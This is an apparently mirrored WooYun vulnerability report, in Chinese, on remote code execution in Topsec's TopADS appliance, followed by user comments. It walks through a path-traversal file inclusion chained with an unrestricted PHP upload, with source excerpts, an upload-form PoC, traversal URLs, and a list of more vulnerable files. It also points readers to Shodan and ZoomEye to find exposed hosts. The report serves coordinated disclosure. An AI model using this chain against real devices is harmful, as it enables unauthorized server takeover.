天融信TopADS文件包含导致多处代码执行漏洞

2017年4月17日01:12:05评论459 views字数 211阅读0分42秒阅读模式

摘要

2016-02-26：细节已通知厂商并且等待厂商处理中
2016-02-29：厂商已经确认，细节仅向厂商公开
2016-03-03：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-04-24：细节向核心白帽子及相关领域专家公开
2016-05-04：细节向普通白帽子公开
2016-05-14：细节向实习白帽子公开
2016-05-29：细节向公众公开

漏洞概要关注数(53) 关注此漏洞

缺陷编号： WooYun-2016-178904

漏洞标题：天融信TopADS文件包含导致多处代码执行漏洞

漏洞作者：老虎皮

提交时间： 2016-02-26 17:22

公开时间： 2016-05-29 10:00

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

11人收藏

漏洞详情

披露状态：

简要描述：

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

详细说明：

偶尔撸到一套TopADS源码

对其源码进行分析

入口为libraries/Ngtos.class.php

入口函数为run()

为mvc架构

参数为：module action

code 区域

$module = trim($_REQUEST['module']) ? trim($_REQUEST['module']) : 'login';
         $action = trim($_REQUEST['action']) ? trim($_REQUEST['action']) : '';
         if ($module == 'home' || $module == 'main' || $module == 'login' || $module == 'logout' || $module == 'password') {
             $action = $module;
             $module = 'page_frame';
         }
         if ($offset = @strpos($module, '_')) {
             $folder = substr($module, 0, $offset);
             $file = substr($module, $offset + 1);
             $filename = ROOTPATH . '/modules/' . $folder . '/' . $file . '.mds.php';
             if (!file_exists($filename)) {
                 $filename = ROOTPATH . '/modules/' . $folder . '/' . $file . '.php';
             }
         } else {
             $filename = ROOTPATH . '/modules/' . $module . '.mds.php';
             if (!file_exists($filename)) {
                 $filename = ROOTPATH . '/modules/' . $module . '.php';
             }
         }
         if (!file_exists($filename)) {
             die('Not Found');
         }
         require_once $filename;

$module变量未经过过滤，导致可以使用../这样的跳转字符，但是后缀又是.mds.php或者.php文件，所以我们也没发包含其他文件，例如有人会说了，截断？

但是这里php版本以及gpc影响，截断不成功，所以这条路行不通。

接下来再看我一步步分析

我接下来分析其中一例，其他的留厂商逐个去修复

在系统system/upload.mds.php中

code 区域

else if ($action == 'local_import') {
     /* if ($_FILES["file"]["error"] > 0)
       {
       include template('system_upload_file');
       return;
       } */
     if (!empty($_FILES["file"]["error"])) {
         switch ($_FILES["file"]['error']) {
             case '1':
                 $error = 'The uploaded file exceeds the upload_max_filesize directive in php.ini';
                 break;
             case '2':
                 $error = 'The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form';
                 break;
             case '3':
                 $error = 'The uploaded file was only partially uploaded';
                 break;
             case '4':
                 $error = 'No file was uploaded.';
                 break;
 
             case '6':
                 $error = 'Missing a temporary folder';
                 break;
             case '7':
                 $error = 'Failed to write file to disk';
                 break;
             case '8':
                 $error = 'File upload stopped by extension';
                 break;
             case '999':
             default:
                 $error = 'No error code avaiable';
         }
         echo $error;
     } else if (empty($_FILES['file']['tmp_name']) || $_FILES['file']['tmp_name'] == 'none') {
         $error = 'No file was uploaded......';
         echo $error;
     } else {
         $param['filename'] = $_FILES["file"]["name"];
         $newfilename = "/tmp/" . $_FILES["file"]["name"];
         if ($_POST['des'])
             $param['comments'] = formatpost($_POST['des']);
         if (move_uploaded_file($_FILES["file"]["tmp_name"], $newfilename)) {
             $rspString = getResponse('system firmware', "webimport", $param, 2);
             if (is_numeric($rspString) && $rspString == 0) {
                 echo 'ok';
             } else {
                 echo $rspString;
             }
         } else {
             include template('system_upload_file');
         }
     }

这里我们可以看到最终写入动作

code 区域

move_uploaded_file($_FILES["file"]["tmp_name"], $newfilename

其中 $newfilename为路径

code 区域

$newfilename = "/tmp/" . $_FILES["file"]["name"];

这里$_FILES["file"]["name"] 即我们的文件名，

有人就说了，那这样文件名可控我们直接跳转写到web目录？

事实上我已经测过了，他本身有过滤，文件名过滤了../这样的字符，只能老老实实的写文件名

所以这里对后缀也没限制，所以我们直接就可以写个php了

构造如下poc

code 区域

<form action="**.**.**.**/index.php?module=system_config&action=importHandle" method="post" enctype="multipart/form-data">
      <input type="file" name="file">
         <input type="submit" name="dosubmit" value="上传" style="margin-top:5px; height:28px;">
     </form>

所以我们的恶意代码就写入了/tmp目录了

所以结合第一步我们的跳转，我们只要

**.**.**.**/index.php?module=../../../../../tmp/文件名

例如我们传的文件名为testwooyun.php

我们连接的时候就用

**.**.**.**/index.php?module=../../../../../tmptestwooyun

其他处在以下列表

auth/localCaPki.mds.php

auth/peerPki.mds.php

auth/pki.mds.php

system/config.mds.php

auth/thirdPki.mds.php

auth/user.mds.php

system/rules.mds.php

ads/ads_staticblist.php

ads/ads_staticwlist.php

ads/policy_defence.mds.php

其中ads/ads_staticblist.php 可以直接shell

因为直接传到web目录了

code 区域

if ($action == "import") {
 51         $upFilePath = "/usr/local/apache2/htdocs/attachements/";
 52         if ($_FILES['file']['size'] > 819200) {   //可输入变量$_FILES 可能存在安全威胁
 53             echo json_encode(array('file_infor' => 'error:上传失败,文件过大,最大800K'));
 54             return;
 55         }
 56         _uploaded_file($_FILES['file']['tmp_name'], $upFilePath.$_FILES['file']['name']);   //可输入变量$_FILES 可能存在安全威胁
 57         if($ok === FALSE){
 58             echo json_encode(array('file_infor' => 'error:上传失败'));
 59         } else {
 60             $err = "";
 61             $fp = fopen($upFilePath.$_FILES['file']['name'], "r");   //可输入变量$_FILES 可能存在安全威胁
 62             while($line = fgets($fp)) {
 63                 $param['whitelist'] =  formatpost($line);
 64                 $rspString = getResponse("ddos global", "add", $param, 2);
 65                 if (is_string($rspString)) {
 66                     $err = $rspString;
 67                 } else{
 68                     $sql = "INSERT INTO ads_static_wlist values"."('".formatpost($line)."') ";
 69                     $db->query($sql);
 70                 }
 71             }

我给出通杀案例：

**.**.**.**//index.php?module=../../../../../tmp/testwooyun

**.**.**.**/index.php?module=../../../../../tmp/testwooyun

**.**.**.**//index.php?module=../../../../../tmp/testwooyun

**.**.**.**/index.php?module=../../../../../tmp/testwooyun

.....其他的请去撒旦上找，或者钟馗之眼上找吧，

天融信这套很多。。。

漏洞证明：

因为直接传到web目录了

code 区域

if ($action == "import") {
 51         $upFilePath = "/usr/local/apache2/htdocs/attachements/";
 52         if ($_FILES['file']['size'] > 819200) {   //可输入变量$_FILES 可能存在安全威胁
 53             echo json_encode(array('file_infor' => 'error:上传失败,文件过大,最大800K'));
 54             return;
 55         }
 56         _uploaded_file($_FILES['file']['tmp_name'], $upFilePath.$_FILES['file']['name']);   //可输入变量$_FILES 可能存在安全威胁
 57         if($ok === FALSE){
 58             echo json_encode(array('file_infor' => 'error:上传失败'));
 59         } else {
 60             $err = "";
 61             $fp = fopen($upFilePath.$_FILES['file']['name'], "r");   //可输入变量$_FILES 可能存在安全威胁
 62             while($line = fgets($fp)) {
 63                 $param['whitelist'] =  formatpost($line);
 64                 $rspString = getResponse("ddos global", "add", $param, 2);
 65                 if (is_string($rspString)) {
 66                     $err = $rspString;
 67                 } else{
 68                     $sql = "INSERT INTO ads_static_wlist values"."('".formatpost($line)."') ";
 69                     $db->query($sql);
 70                 }
 71             }

我给出通杀案例：

**.**.**.**//index.php?module=../../../../../tmp/testwooyun

**.**.**.**/index.php?module=../../../../../tmp/testwooyun

**.**.**.**//index.php?module=../../../../../tmp/testwooyun

**.**.**.**/index.php?module=../../../../../tmp/testwooyun

.....其他的请去撒旦上找，或者钟馗之眼上找吧，

天融信这套很多。。。

修复方案：

版权声明：转载请注明来源老虎皮@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-02-29 09:58

厂商回复：

已确认，谢谢提交

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-02-26 17:43 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

2

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

1# 回复此人
2016-02-26 17:48 | 狗狗侠 ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)

1

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

2# 回复此人
2016-02-26 17:48 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )

1

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

3# 回复此人
2016-02-26 17:59 | 盛大网络(乌云厂商)

1

@xfkxfk

4# 回复此人
2016-02-26 18:04 | f4ckbaidu ( 普通白帽子 | Rank:265 漏洞数:33 | 开发真是日了狗了)

1

日穿了。。

5# 回复此人
2016-02-26 18:20 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

2

@盛大网络 .....

6# 回复此人
2016-02-26 18:34 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

1

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

7# 回复此人
2016-02-26 18:38 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

2

猜猜洞主是谁？

8# 回复此人
2016-02-27 13:01 | xfkxfk ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵！)

2

@盛大网络

9# 回复此人
2016-03-03 10:26 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

1

不吹不黑。。

10# 回复此人
2016-03-03 14:18 | xfkxfk ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵！)

1

这个系统没办法截断，我才是上传php文件然后再包含的

11# 回复此人
2016-03-03 14:28 | anting ( 普通白帽子 | Rank:105 漏洞数:38 | 活到老，学到老)

1

全部打包（13处）我是好孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

12# 回复此人
2016-03-03 17:29 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

1

全部打一个包（头上13处）我是坏孩子，我不吹牛逼，全部是rce，我详细分析，乌云，奖励来

13# 回复此人
2016-05-30 11:51 | idarker ( 路人 | Rank:4 漏洞数:2 | 爱生活，╮(╯▽╰)╭)

0

貌似洞主是个妹子。。。

14# 回复此人

漏洞概要 关注数(53) 关注此漏洞

缺陷编号： WooYun-2016-178904

漏洞标题： 天融信TopADS文件包含导致多处代码执行漏洞

相关厂商： 天融信

漏洞作者： 老虎皮

提交时间： 2016-02-26 17:22

公开时间： 2016-05-29 10:00

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

11人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 老虎皮@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(53) 关注此漏洞

漏洞标题：天融信TopADS文件包含导致多处代码执行漏洞

相关厂商：天融信

漏洞作者：老虎皮

漏洞类型：文件上传导致任意代码执行

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

版权声明：转载请注明来源老虎皮@乌云

漏洞评价(共0人评价):

登陆后才能进行评分